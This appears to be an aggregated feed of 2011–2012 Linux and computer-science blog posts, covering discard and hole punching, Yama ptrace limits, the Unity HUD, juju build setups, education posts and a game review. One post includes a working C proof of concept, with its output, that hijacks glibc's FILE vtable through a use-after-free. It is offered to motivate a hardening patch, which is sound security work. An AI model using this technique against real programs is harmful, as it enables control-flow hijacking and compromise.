Under Linux, there are a number of related features around marking areas of a file, filesystem, or block device as “no longer allocated”. In the standard view, here’s what happens if you fill a file to 500M and then truncate it to 100M, using the “truncate” syscall:

The important thing to note here is that in step 3 the block device has no idea about the released data blocks. The original contents of the file are actually still on the device. (And to a certain extent is why programs like shred exist.) While the recoverability of such released data is a whole other issue, the main problem about this lack of information for the block device is that some devices (like SSDs) could use this information to their benefit to help with extending their life, etc. To support this, the “TRIM” set of commands were created so that a block device could be informed when blocks were released. Under Linux, this is handled by the block device driver, and what the filesystem can pass down is “discard” intent, which is translated into the needed TRIM commands.

So now, when discard notification is enabled for a filesystem (e.g. mount option “discard” for ext4), the earlier example looks like this:

While SSDs can use discard to do fancy SSD things, there’s another great use for discard, which is to restore sparseness to files. Normally, if you create a sparse file (open, seek to size, close), there was no way, after writing data to this file, to “punch a hole” back into it. The best that could be done was to just write zeros over the area, but that took up filesystem space. So, the ability to punch holes in files was added via the FALLOC_FL_PUNCH_HOLE option of fallocate. And when discard was enabled for a filesystem, these punched holes would get passed down to the block device as well.

Take, for example, a qemu/KVM VM running on a disk image that was built from a sparse file. While inside the VM instance, the disk appears to be 10G. Externally, it might only have actually allocated 600M, since those are the only blocks that had been allocated so far. In the instance, if you wrote 8G worth of temporary data, and then deleted it, the underlying sparse file would have ballooned by 8G and stayed ballooned. With discard and hole punching, it’s now possible for the filesystem in the VM to issue discards to the block driver, and then qemu could issue hole-punching requests to the sparse file backing the image, and all of that 8G would get freed again. The only down side is that each layer needs to correctly translate the requests into what the next layer needs.

With Linux 3.1, dm-crypt supports passing discards from the filesystem above down to the block device under it (though this has cryptographic risks, so it is disabled by default). With Linux 3.2, the loopback block driver supports receiving discards and passing them down as hole-punches. That means that a stack like this works now: ext4, on dm-crypt, on loopback of a sparse file, on ext4, on SSD. If a file is deleted at the top, it’ll pass all the way down, discarding allocated blocks all the way to the SSD:

Set up a sparse backing file, loopback mount it, and create a dm-crypt device (with “allow_discards”) on it:

# cd /root
# truncate -s10G test.block
# ls -lk test.block
-rw-r--r-- 1 root root 10485760 Feb 15 12:36 test.block
# du -sk test.block
0       test.block
# DEV=$(losetup -f --show /root/test.block)
# echo $DEV
/dev/loop0
# SIZE=$(blockdev --getsz $DEV)
# echo $SIZE
20971520
# KEY=$(echo -n "my secret passphrase" | sha256sum | awk '{print $1}')
# echo $KEY
a7e845b0854294da9aa743b807cb67b19647c1195ea8120369f3d12c70468f29
# dmsetup create testenc --table "0 $SIZE crypt aes-cbc-essiv:sha256 $KEY 0 $DEV 0 1 allow_discards"

Now build an ext4 filesystem on it. This enables discard during mkfs, and disables lazy initialization so we can see the final size of the used space on the backing file without waiting for the background initialization at mount-time to finish, and mount it with the “discard” option:

# mkfs.ext4 -E discard,lazy_itable_init=0,lazy_journal_init=0 /dev/mapper/testenc
mke2fs 1.42-WIP (16-Oct-2011)
Discarding device blocks: done
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
655360 inodes, 2621440 blocks
131072 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=2684354560
80 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632

Allocating group tables: done
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done 

# mount -o discard /dev/mapper/testenc /mnt
# sync; du -sk test.block
297708  test.block

Now, we create a 200M file, examine the backing file allocation, remove it, and compare the results:

# dd if=/dev/zero of=/mnt/blob bs=1M count=200
200+0 records in
200+0 records out
209715200 bytes (210 MB) copied, 9.92789 s, 21.1 MB/s
# sync; du -sk test.block
502524  test.block
# rm /mnt/blob
# sync; du -sk test.block
297720  test.block

Nearly all the space was reclaimed after the file was deleted. Yay!

Note that the Linux tmpfs filesystem does not yet support hole punching, so the exampe above wouldn’t work if you tried it in a tmpfs-backed filesystem (e.g. /tmp on many systems).

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

February 15, 2012 09:19 PM

Systers just started a 'best of' blog that highlights useful conversations that have happened on the popular mailing list for technical women.  The first post, Life as a Professor, is all about what being a professor is like, particularly in the work-life balance sense.

 

View this post and more at The Female Perspective of Computer Science.

February 15, 2012 04:46 PM

While looking for something to use as a system-unique fall-back when a TPM is not available, I looked at /sys/devices/virtual/dmi/id/product_uuid (same as dmidecode‘s “System Information / UUID”), but was disappointed when, under KVM, the file was missing (and running dmidecode crashes KVM *cough*). However, after a quick check, I noticed that KVM supports the “-uuid” option to set the value of /sys/devices/virtual/dmi/id/product_uuid. Looks like libvirt supports this under capabilities / host / uuid in the XML, too.

host# kvm -uuid 12345678-ABCD-1234-ABCD-1234567890AB ...
host# ssh localhost ...
...
guest# cat /sys/devices/virtual/dmi/id/product_uuid
12345678-ABCD-1234-ABCD-1234567890AB

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

February 10, 2012 06:08 PM

Check out this talk that asks the question 'What would it take to create a moonshot factory?' It's given by Michael Crow of Arizona State University as part of the new initiative We Solve for X, "a forum to encourage and amplify technology-based moonshot thinking and teamwork."

View this post and more at The Female Perspective of Computer Science.

February 09, 2012 12:47 PM

What do you get when you mix psychology, education, and neuroscience? For Tracey Tokuhama-Espinosa, you get MBE (Mind, Brain, and Education) Science.  I recently looked at her book The New Science of Learning: Using the Best of Mind, Brain, and Education Science in the Classroom.  It described what so-called facts about learning are definitely true (i.e. proven by all three areas), probably true, intelligent speculation, and definitely not true, followed by lists of tenets and principles of learning.

View this post and more at The Female Perspective of Computer Science.

February 07, 2012 08:02 PM

As I discussed last year, Ubuntu has been restricting the use of ptrace for a few releases now. I’m excited to see Fedora starting to introduce similar restrictions, but I’m disappointed at the specific implementation:

Blocking ptrace blocks exactly one type of attack: credential extraction from a running process. In the face of a persistent attack, ultimately, anything running as the user can be trojaned, regardless of ptrace. Blocking ptrace, however, stalls the initial attack. At the moment an attacker arrives on a system, they cannot immediately extend their reach by examining the other processes (e.g. jumping down existing SSH connections, pulling passwords out of Firefox, etc). Some sensitive processes are already protected from this kind of thing because they are not “dumpable” (due to either specifically requesting this from prctl(PR_SET_DUMPABLE, ...) or due to a uid/gid transition), but many are open for abuse.

The primary “valid” use cases for ptrace are crash handlers, debuggers, and memory analysis tools. In each case, they have a single common element: the process being ptraced knows which process should have permission to attach to it. What Linux lacked was a way to declare these relationships, which is what Yama added. The use of SELinux policy, for example, isn’t sufficient because the permissions are too wide (e.g. giving gdb the ability to ptrace anything just means the attacker has to use gdb to do the job). Right now, due to the use of Yama in Ubuntu, all the mentioned tools have the awareness of how to programmatically declare the ptrace relationships at runtime with prctl(PR_SET_PTRACER, ...). I find it disappointing that Fedora won’t be using this to their advantage when it is available and well tested.

Even ChromeOS uses Yama now. ;)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

February 07, 2012 12:48 AM

Launchpad users know that it can send quite a bit of e-mail. Okay, a LOT of e-mail. There has been effort on the Launchpad side of things to add controls to set the amount of Launchpad e-mail you get. But for some of us, even getting the mail that you need results in a fair amount of Launchpad mail. In playing with my procmail config for Launchpad mail I stumbled on this little feature that I love, and thought I'd share, as it's cleaned up my mail a lot. The secret rule is:

:0:
* ^X-launchpad-bug:.*product=\/[a-z0-9-]+
.Launchpad.Bugs.${MATCH}/

Quite simply that rule takes the project specifier on a bug mail, and uses it for the folder name that it puts the mail into. This means each project gets it's own mail box, no matter what. So even as you add groups or subscribe to new bugs, you just get new mail boxes. Works for me. Hope it helps other folks too.

Comments: Identi.ca | Twitter

February 01, 2012 04:19 PM

After being bogged down with 'real life', I've finally managed to get things moving bak on track... so time to get back to the blogging. A lot has gone on, and is getting ready to happen. Conferences conferences conferences and more conferences, hardware, Inkscape hacking, and more...

We have a lot planned, and maybe something for most anyone. Inkscape has picked up a few more active contributors, and I've gotten progress on a few 'interesting' tweaks. Some seem just for fun, but others have good practical application. We're also trying to get together some more organized meetings, online and in person, so that will be good. Also look for more on the front to help promote Inkscape.

Much went on at this past linux.conf.au, with great people helping out and some really outstanding presentations going on. Bruce Perens had some very important things to say, and it looks to be very helpful. And I even had my talk on logo design for developers make it up online. (There are more going up over time, and the mirrors should be getting ogg versions too.)

Posts will show up highlighting things from linux.conf.au and SCALE10x shortly. There will even be a few photos here and there. Most importantly, though, is that things should get more and more active here, and posts should be quite regular now.

February 01, 2012 12:21 AM

One of the neatest parts about starting to get more application data into the open is that we can start to use it in interesting ways. I'm happy to talk about a new way that we're using the menu data: the HUD. The idea behind the HUD is that you can quickly find functionality in an application without having to know the menu structure. But how does it do it? How can you make it better?

Getting the data

We're using the same Dbusmenu data that is currently exported to the global menu, just remixing it for search. We are searching through the labels in the menu items which gives us already localized data straight from the application. This means that it should work for the language that the application is in. In the future we hope to use information like accessibility data as well as any tooltips that might be attached to a menuitem (though we don't show tooltips in the global menu).

Any application that works with the window menus today should also work with HUD out of the box.

Matching the label

To match the label we're basically using an implementation of the Levenshtein distance with a few additions. What this allows us to do is rank possible solutions in a relevancy order, and present some solutions that might occur via "fat finger" or other similar type errors. But, this also means that there is some fuzzy algorithms involved in the matching which will have to be tuned.

We expect to tune them over the next few releases, and to do that we have a set of test cases that we're using for the tuning. The problem with those test cases? They're only in the languages I speak. You probably speak in more/different/better languages than I do, please feel free to propose merges that extend this test suite so that as we continue to tune the search algorithms we don't leave any language behind.

Remembering Favorites

One of the additions that we add to the distance calculation is an offset based on which entries you've used most recently. Your favorite functionality in the application. Quite simply we're storing a list of items you've used over the last thirty days and a timestamp of when you used them. This database is simple but it can be fun to look into for the curious and I wanted to talk a bit about a couple of the tools that you can use to see the data.

$ hud-list-applications

This will list all the applications that have data on them in your HUD usage database. They are identified by the path to their desktop file as determined by BAMF. You can then look at the menu items used in a specific application:

$ hud-dump-application /usr/share/applications/inkscape.desktop 

This shows the individual items that you've used, and the number of times that you've used them. If you want to inspect the exact file tracking the data it is available at:

~/.cache/indicator-appmenu/hud-usage-log.sqlite

While talking about various tools to work with HUD I thought I'd also mention that you can also, just for fun, work with HUD from the command line using the command line tool:

$ hud-cli

Application initial bias

Application designers have always had a problem figuring out how to promote specific functionality that is commonly used to the forefront, while still making the rest of the functionality easily available. The most recent ways that they've done this is with toolbars and ribbon style. You can't adjust the positioning even when you know that the particular toolbar isn't best for the user because it will mess up the user's spacial memory. HUD sidesteps this issue by providing all the options, just promoting certain ones based on usage. They're all in the same place (the HUD) but with always improving ordering.

What happens on first usage of the application? At that point we don't have any way to know what the user wants to do, we we've provide a way for the application designer to provide the most likely items for general users. Effectively, this is the HUD's version of the default toolbar setup in an application; though it automatically decays and adjusts to the user's usage pattern.

The files that control this initial bias are very simple and there is an example in the test suite. Basically they have the various menu items along with a value that describes how to preload the usage database. A '5' there would mean that 5 entries are added to the usage database for that item on the first time that application is used; one for today and each of the four days previous. In this way, as values drop off by being too old, there isn't a step function in how the item is ranked, it just slowly drops down in priority. Application designers should start to think about how they would rank the menu items in their application, and start getting these integrated into either the releases or the packages of those applications so that users have a good first experience with their application.

Development notes

The code for the HUD lives in the indicator-appmenu repository. Currently it exists on a branch that needs to be reviewed before merging, but that shouldn't be for long. I expect it to get merged to trunk in the next couple of weeks.

After that the biggest change will be integration with indicator-appmenu. It was originally implemented as it's own service to make development more agile, but it clearly shares a large amount of data with the global menu and there's no reason to have two repositories in memory of the same data. It also needs to synchronize heavily with the application menu and BAMF, which is also already in indicator-appmenu. Thanks to the magic of DBus no one should notice the change in processes as the names and objects will migrate over to the new process.

As this is more of a first prototype there are also some missing features that need to be added. The first of those is to simply improve the matching. We also need to get better descriptions from application indicators, today we're using their accessibility description (you set those, right?) but that typically has too much information. Lastly, we need to integrate better with applications that expect the about-to-show signal for their menus. This includes XUL applications and some Qt ones, so it's an important feature for making the HUD usable for everyone.

Merges and bugs should be directed towards the indicator-appmenu project and also make sure you've signed the Canonical Contributor Agreement for any code contributed.

Comments: Identi.ca | Twitter

January 24, 2012 02:15 PM

Recently the upstream Linux kernel released a fix for a serious security vulnerability (CVE-2012-0056) without coordinating with Linux distributions, leaving a window of vulnerability open for end users. Luckily:

Still, it’s a cross-architecture local root escalation on most common installations. Don’t stop reading just because you don’t have a local user base — attackers can use this to elevate privileges from your user, or from the web server’s user, etc.

Since there is now a nearly-complete walk-through, the urgency for fixing this is higher. While you’re waiting for your distribution’s kernel update, you can use systemtap to change your kernel’s running behavior. RedHat suggested this, and here’s how to do it in Debian and Ubuntu:

$ make correct_proc_mem_reproducer
...
$ ./correct_proc_mem_reproducer
vulnerable

# apt-get install -y systemtap linux-image-$(uname -r)-dbg

$ sudo apt-get install -y lsb-release
$ echo "deb http://ddebs.ubuntu.com/ $(lsb_release -cs) main restricted universe multiverse" | \
      sudo tee -a /etc/apt/sources.list.d/ddebs.list
$ sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ECDCAD72428D7C01
$ sudo apt-get update

sudo apt-get install -y systemtap linux-image-$(uname -r)-dbgsym

$ sudo apt-get install -y systemtap dpkg-dev
$ wget http://ddebs.ubuntu.com/pool/main/l/linux/$(dpkg -l linux-image-$(uname -r) | grep ^ii | awk '{print $2 "-dbgsym_" $3}' | tail -n1)_$(dpkg-architecture -qDEB_HOST_ARCH).ddeb
$ sudo dpkg -i linux-image-$(uname -r)-dbgsym.ddeb

$ cat > proc-pid-mem.stp <<'EOM'
probe kernel.function("mem_write@fs/proc/base.c").call {
        $count = 0
}
EOM
$ sudo stap -Fg proc-pid-mem.stp

$ ./correct_proc_mem_reproducer
not vulnerable

In this case, the systemtap script is changing the argument containing the size of the write to zero bytes ($count = 0), which effectively closes this vulnerability.

UPDATE: here’s a systemtap script from Soren that doesn’t require the full debug symbols. Sneaky, put can be rather slow since it hooks all writes in the system. :)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

January 22, 2012 11:22 PM

Larry Smith told the TEDxUW (University of Waterloo) audience that they will fail to have a great career.  After all, there are ever so many excuses that crop up to justify why you can't follow your passion.  Alas, there is no such thing as a "good" career according to Larry, so if you try to settle for one, you'll just end up with one of those terrible, soul-sucking jobs.  Unless...

View this post and more at The Female Perspective of Computer Science.

January 16, 2012 02:57 PM

As someone who is always looking for outreach opportunities with middle and high school students, I enjoyed The Guardian's recent article called Michael Gove to scrap 'boring' IT lessons: Schools to be given freedom to run cutting-edge computer classes under plans for open source curriculum.  From the article:

View this post and more at The Female Perspective of Computer Science.

January 13, 2012 01:13 PM

The Soundbox device I have built uses some construction techniques I want to share with you readers. I'm mainly talking about the enclosure and the texts on controls.

January 04, 2012 10:29 PM

2011 was special, particularly with the arrival of our daughter Molly.  But 2012 is looking pretty great, too!

View this post and more at The Female Perspective of Computer Science.

December 31, 2011 12:03 PM

When attacking a process, one interesting target on the heap is the FILE structure used with “stream functions” (fopen(), fread(), fclose(), etc) in glibc. Most of the FILE structure (struct _IO_FILE internally) is pointers to the various memory buffers used for the stream, flags, etc. What’s interesting is that this isn’t actually the entire structure. When a new FILE structure is allocated and its pointer returned from fopen(), glibc has actually allocated an internal structure called struct _IO_FILE_plus, which contains struct _IO_FILE and a pointer to struct _IO_jump_t, which in turn contains a list of pointers for all the functions attached to the FILE. This is its vtable, which, just like C++ vtables, is used whenever any stream function is called with the FILE. So on the heap, we have:

In the face of use-after-free, heap overflows, or arbitrary memory write vulnerabilities, this vtable pointer is an interesting target, and, much like the pointers found in setjmp()/longjmp(), atexit(), etc, could be used to gain control of execution flow in a program. Some time ago, glibc introduced PTR_MANGLE/PTR_DEMANGLE to protect these latter functions, but until now hasn’t protected the FILE structure in the same way.

I’m hoping to change this, and have introduced a patch to use PTR_MANGLE on the vtable pointer. Hopefully I haven’t overlooked something, since I’d really like to see this get in. FILE structure usage is a fair bit more common than setjmp() and atexit() usage. :)

Here’s a quick exploit demonstration in a trivial use-after-free scenario:

#include <stdio.h>
#include <stdlib.h>

void pwn(void)
{
    printf("Dave, my mind is going.\n");
    fflush(stdout);
}

void * funcs[] = {
    NULL, // "extra word"
    NULL, // DUMMY
    exit, // finish
    NULL, // overflow
    NULL, // underflow
    NULL, // uflow
    NULL, // pbackfail
    NULL, // xsputn
    NULL, // xsgetn
    NULL, // seekoff
    NULL, // seekpos
    NULL, // setbuf
    NULL, // sync
    NULL, // doallocate
    NULL, // read
    NULL, // write
    NULL, // seek
    pwn,  // close
    NULL, // stat
    NULL, // showmanyc
    NULL, // imbue
};

int main(int argc, char * argv[])
{
    FILE *fp;
    unsigned char *str;

    printf("sizeof(FILE): 0x%x\n", sizeof(FILE));

    /* Allocate and free enough for a FILE plus a pointer. */
    str = malloc(sizeof(FILE) + sizeof(void *));
    printf("freeing %p\n", str);
    free(str);

    /* Open a file, observe it ended up at previous location. */
    if (!(fp = fopen("/dev/null", "r"))) {
        perror("fopen");
        return 1;
    }
    printf("FILE got %p\n", fp);
    printf("_IO_jump_t @ %p is 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));

    /* Overwrite vtable pointer. */
    *(unsigned long*)(str + sizeof(FILE)) = (unsigned long)funcs;
    printf("_IO_jump_t @ %p now 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));

    /* Trigger call to pwn(). */
    fclose(fp);

    return 0;
}

Before the patch:

$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0xf7796aa0
_IO_jump_t @ 0x984609c now 0x0804a060
Dave, my mind is going.

After the patch:

$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0x3a4125f8
_IO_jump_t @ 0x984609c now 0x0804a060
Segmentation fault

Astute readers will note that this demonstration takes advantage of another characteristic of glibc, which is that its malloc system is unrandomized, allowing an attacker to be able to determine where various structures will end up in the heap relative to each other. I’d like to see this fixed too, but it’ll require more time to study. :)

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

December 23, 2011 12:46 AM

Andrew and I are delighted to announce the birth of our first child, Molly! She was born on December 16 at 5:47pm and weighed 7 lbs 3 oz.  We're all doing well and enjoying our time together as a new family.

View this post and more at The Female Perspective of Computer Science.

December 22, 2011 12:29 PM

PBS aired this program back in February this year.  It is almost an hour long and features many of the big names in 21st century learning, including James Paul Gee and Katie Salen.  If you're interested in game-based education, educational games, and digital media for learning in general, it's a good watch.  I quite enjoyed it.  (Note: It looks like you can't watch the whole thing in the embedded video, so if you have an hour, head to the full link.)

View this post and more at The Female Perspective of Computer Science.

December 15, 2011 02:11 PM

Part of the reason I’m not using social media now is that I have found that I am not able to have complete thoughts. Instead 140 characters gives me a funnel towards emotional comments, and unfounded arguments. Well, I have a secret weapon in my battle for making longer than 5 sentence speech fragments, and its more than Christopher, Nkinkade or Wolfgang countering my sometimes emotional decision making.

My original unfounded comment: “China has the most people living in poverty.”

Here’s how a gift email landed in my inbox:

Thanks for the thoughtful research. Time to get with the program REJON!

December 13, 2011 10:15 PM

I'm excited about two new team members that we have, Thomas Voß and Allan LeSage, who are working to increase our quality infrastructure. One of the first things they've been working on is getting per-commit code coverage measurements of our unit tests in to Jenkins. I think that this is great because, while we have tests, we have no real way to know if we have enough tests. Code coverage isn't a magic bullet there, but it does give us some idea of where we stand.

If you had asked me (as soon as yesterday) about dbus-test-runner's test suite I would have described it as good. It's a small amount of code, and it has quite a few tests. So it must be good. Allan submitted a merge request to add code coverage measurements. Here's what came out on the summary:

Ouch! I don't think we could really describe that as good. Not awful, but it should be better, especially for a test tool!

This story does have a happy ending. I took a little bit of time to make a new branch that adds tests, but also makes the utility more testable so that the code can be hit in a reasonable test. Overall, a big win for dbus-test-runner. Here's the results after that branch:

Comments: Identi.ca | Twitter

December 10, 2011 04:31 AM

The Royal Canadian Mounted Police, our federal police force, recently had its 23rd commissioner formally installed.  There have been problems with the previous commissioners, but from what I'm hearing so far from Bob Paulson, things are looking up.

View this post and more at The Female Perspective of Computer Science.

December 09, 2011 11:44 AM

Prepare a location to run juju and install it:

mkdir ~/party
cd ~/party
sudo apt-get install juju

Initialize your juju environment. Be sure to add “juju-origin: ppa” to your environment, along with filling in your access-key and secret-key from your Amazon AWS account. Note that control-bucket and admin-secret should not be used by any other environment or juju won’t be able to distinguish them. Other variables are good to set now too. I wanted my instances close to me, use I set “region: us-west-1“. I also wanted a 64bit system, so using the AMI list, I chose “default-series: oneiric“, “default-instance-type: m1.large” and “default-image-id: ami-7b772b3e”

juju
$EDITOR ~/.juju/environments.yaml

Get my sbuild charm, and configure some types of builders. The salt should be something used only for this party; it is used to generate the random passwords for the builder accounts. The distro and releases can be set to whatever the mk-sbuild tool understands.

bzr co lp:~kees/charm/oneiric/sbuild/trunk sbuild-charm
cat >local.yaml <<EOM
builder-debian:
    salt: some-secret-phrase-for-this-party
    distro: debian
    releases: unstable
builder-ubuntu:
    salt: some-secret-phrase-for-this-party
    distro: ubuntu
    releases: precise,oneiric
EOM

Bootstrap juju and wait for ec2 instance to come up.

juju bootstrap

Before running the status, you can either accept the SSH key blindly, or use “ec2-describe-instances” to find the instance and public host name, and use my “wait-for-ssh” tool to inject the SSH host key into your ~/.ssh/known_hosts file. This requires having set up the environment variables needed by “ec2-describe-instances“, though.

ec2-describe-instances --region REGION
./sbuild-charm/wait-for-ssh INSTANCE HOST REGION

Get status:

juju status

Deploy a builder:

juju deploy --config local.yaml --repository $PWD local:sbuild-charm builder-debian

Deploy more of the same type:

juju add-unit builder-debian
juju add-unit builder-debian
juju add-unit builder-debian

Now you have to wait for them to finish installing, which will take a while. Once they’re at least partially up (the “builder” user has been created), you can print out the slips of paper to hand out to your party attendees:

./sbuild-charm/slips | mpage -1 > /tmp/slips.ps
ps2pdf /tmp/slips.ps /tmp/slips.pdf

They look like this:

Unit: builder-debian/3
Host: ec2-256-1-1-1.us-west-1.compute.amazonaws.com
SSH key fingerprints:
  1024 3e:f7:66:53:a9:e8:96:c7:27:36:71:ce:2a:cf:65:31 (DSA)
  256 53:a9:e8:96:c7:20:6f:8f:4a:de:b2:a3:b7:6b:34:f7 (ECDSA)
  2048 3b:29:99:20:6f:8f:4a:de:b2:a3:b7:6b:34:bc:7a:e3 (RSA)
Username: builder
Password: 68b329da9893

To admin the machines, you can use juju itself, where N is the machine number from the “juju status” output:

juju ssh N

To add additional chroots to the entire builder service, add them to the config:

juju set builder-debian release=unstable,testing,stable
juju set builder-ubuntu release=precise,oneiric,lucid,natty

Notes about some of the terrible security hacks this charm does:

Enjoy!

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

December 07, 2011 05:53 PM

My earlier post on juju described a number of weird glitches I ran into. I got invited by hazmat on IRC (freenode #juju) to try to reproduce the problems so we could isolate the trouble.

Fix #1: use the version from the PPA. The juju setup documentation doesn’t mention this, but it seems that adding “juju-origin: ppa” to your ~/.juju/environment.yaml is a good idea. I suggest it be made the default, and to link to the full list of legal syntax for the environment.yaml file. I was not able to reproduce the missing-machines-at-startup problem after doing this, but perhaps it’s a hard race to lose.

Fix #2: don’t use “terminate-machine“. :P There seems to be a problem around doing the following series of commands: “juju remove-unit FOO/N; juju terminate-machine X; juju add-unit FOO“. This makes the provisioner go crazy, and leaves all further attempts to add units stick in “pending” forever.

Big thank you to hazmat and SpamapS for helping debug this.

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

December 07, 2011 05:11 PM

Things are about to get really nutty, and I expect I won't be able to post to the blog too much in the next 6-8 weeks (though I will still try to get some content here!).  So here's a quick update to keep you going.

I've been trying to get as much done for school as possible before baby arrives, but there have been a few factors making this difficult.  The main thing is that baby is still in breech position, meaning its head is up instead of down where it should be.  Traditionally, this has meant an automatic c-section, which is something I desperately don't want for a number of complex reasons I can't fully articulate here.  Fortunately, safe, regular breech deliveries are starting to come back into fashion, and there is a chance that if baby doesn't turn in time I could still avoid the surgery.

But, of course, the best outcome of all would be to get baby to turn and not have to make the tough decision on what to do when labour hits.  We've been trying a few things, from the Webster technique to various inversions.  We even had an ECV yesterday, where the doctor tries to manually turn the baby from the outside.  That was unsuccessful, but we are planning to try again next week and continuing doing everything we can, no matter how silly it seems.

So that's going to be consuming my attention for the next little while.  I will still try to be optimistic about getting more done for school, but there may be a point I have to just throw in the towel.  I'd be disappointed, but ok with this.  You can only do what you can do, right?

View this post and more at The Female Perspective of Computer Science.

December 07, 2011 02:10 PM

Busy time indeed! I made a blog post on Fab blog about the work we did in the fall to rebuild all of Creative Commons public websites. Here’s a snippet:

December 06, 2011 06:59 PM

On Sunday, I brought up EC2 instances to support the combined Debian Bug Squashing Party/Ubuntu Local Jam that took place at PuppetLabs in Portland, OR, USA. The intent was to provide each participant with their own sbuild environment on a 64bit machine, since we were going to be working on Multi-Arch support, and having both 64bit and 32bit chroots would be helpful. The host was an Ubuntu 11.10 (Oneiric) instance so it would be possible to do SRU verifications in the cloud too.

I was curious about the juju provisioning system, since it has an interesting plugin system, called “charms”, that can be used to build out services. I decided to write an sbuild charm, which was pretty straight forward and quite powerful (using this charm it would be possible to trigger the creation of new schroots across all instances at any time, etc).

The juju service itself works really well when it works correctly. When something goes wrong, unfortunately, it becomes nearly impossible to debug or fix. Repeatedly while working on charm development, the provisioning system would lose its mind, and I’d have to destroy the entire environment and re-bootstrap to get things running again. I had hoped this wouldn’t be the case while I was using it during “production” on Sunday, but the provisioner broke spectacularly on Sunday too. Due to the fragility of the juju agents, it wasn’t possible to restart the provisioner — it lost its mind, the other agent’s couldn’t talk to it any more, etc. I would expect the master services on a cloud instance manager to be extremely robust since having it die would mean totally losing control of all your instances.

On Sunday morning, I started 8 instances. 6 came up perfectly and were excellent work-horses all day at the BSP. 2 never came up. The EC2 instances started, but the service provisioner never noticed them. Adding new units didn’t work (instances would start, but no services would notice them), and when I tried to remove the seemingly broken machines, the instance provisioner completely went crazy and started dumping Python traces into the logs (which seems to be related to this bug, though some kind of race condition seems to have confused it much earlier than this total failure), and that was it. We used the instances we had, and I spent 3 hours trying to fix the provisioner, eventually giving up on it.

I was very pleased with EC2 and Ubuntu Server itself on the instances. The schroots worked, sbuild worked (though I identified some additional things that the charm should likely do for setup). I think juju has a lot of potential, but I’m surprised at how fragile it is. It didn’t help that Amazon had rebooted the entire West Coast the day before and there were dead Ubuntu Archive Mirrors in the DNS rotation.

For anyone else wanting to spin up builders in the cloud using juju, I have a run-down of what this looks like from the admin’s perspective, and even include a little script to produce little slips of paper to hand out to attendees with an instance’s hostname, ssh keys, and builder SSH password. Seemed to work pretty well overall; I just wish I could have spun up a few more. :)

So, even with the fighting with juju and a few extra instances that came up and I had to shut down again without actually using them, the total cost to run the instances for the whole BSP was about US$40, and including the charm development time, about US$45.

UPDATE: some more details on how to avoid the glitches I hit.

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

December 06, 2011 12:05 AM

Handy command line arguments for gpg:

gpg --list-options show-photos --fingerprint 0xdc6dc026

This is nice to examine someone’s PGP photo. You can also include it in --verify-options, depending on how/when you want to see the photo (for example, when doing key signings).

If gpg doesn’t pick the right photo viewer, you can override it with --photo-viewer 'eog %I' or similar.

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

December 05, 2011 09:35 PM

So often we think of the arts and science as opposites.  Many who are talented in one feel hopelessly lost in the other.  But the two are more related than it might seem, sometimes in the most unexpected ways...

Take last year's Dance Your PhD contest winners from the chemistry department of my own school, Carleton University.  Their dance explains a technique called Systematic Evolution of Ligands by Exponential Enrichment (SELEX).

View this post and more at The Female Perspective of Computer Science.

December 05, 2011 10:00 AM

Gamification is certainly a hot topic these days.  Jesse Schell opened Pandora's Box with his Visions of the Gamepocalypse talk.  Sebastian Deterding discussed the promises and pitfalls of gamification.  Ian Bogost came right out and said that Gamification is Bullshit.  And yet, there are many who believe that gamifying education could be a very good thing.

Take Extra Credits (now hosted on Penny Arcade) and their view of how we might gamify education.  They envision rewards systems that count up from zero rather than down from a perfect grade.  Perhaps the most interesting example of gamifying education so far, though, has been the charter school Quest 2 Learn.  I was skeptical of how well the concept would be implemented at first, but the more I learn about it the more impressed and excited I am.

Enter the latest project I've encountered: Just Press Play.  I first learned about this initiative on the Microsoft Research Connections Blog (via Reddit, of all places), where Donald Brinkman posted an article called Unlocking Academic Success with Frame Games for Learning.  As he describes the project:

 

View this post and more at The Female Perspective of Computer Science.

November 29, 2011 11:06 AM

Been playing NFS:The Run, and have found myself shouting at the tv in frustration, how did they take such a good concept and screw it up so badly? A coast to coast canonball style run in super cars. 3000 odd miles of non stop racing. Sounds great! Except its not. Its not non-stop and its not 3000 miles. It stops every 5 minutes or so as the race is broken up into a zillion stages. Just as you get in a groove and its stage over, heres a bunch of pointless achievements and now you can hit A twice to wait through a load screen to carry on. 

On the screens between levels its constantly telling you your stats, Run time, 15mins, avg speed 140mph, miles travelled 300 plus? what the hell? ok, you’ve cut the distance down. stop making it so frikken obvious. I can do speed x time, its pretty obvious that the sums dont add up. 

Then theres the stupid stage modes, “pass 8 people to progress” its not really a coast to coast race if you cant progress past any 5 minute stage without finishing in the position the game makers have decided is the place that you need to be in at that point. 

Dont even get me started on the out of car bits. Why do I have to randomly mash the A button to make him run from cops, then bash the Y to make him jump a fence? Seriously pointless, and really badly done. if you want to have these ‘story’ bits to make me change car, just put them in as cutscenes and be done with it. 

I know, its a NFS game, its not meant to be vaguely realistic, its an action game, etc etc. but its just dumb. 

This could have been a great game. Its barely good. such a shame.

November 25, 2011 09:47 PM

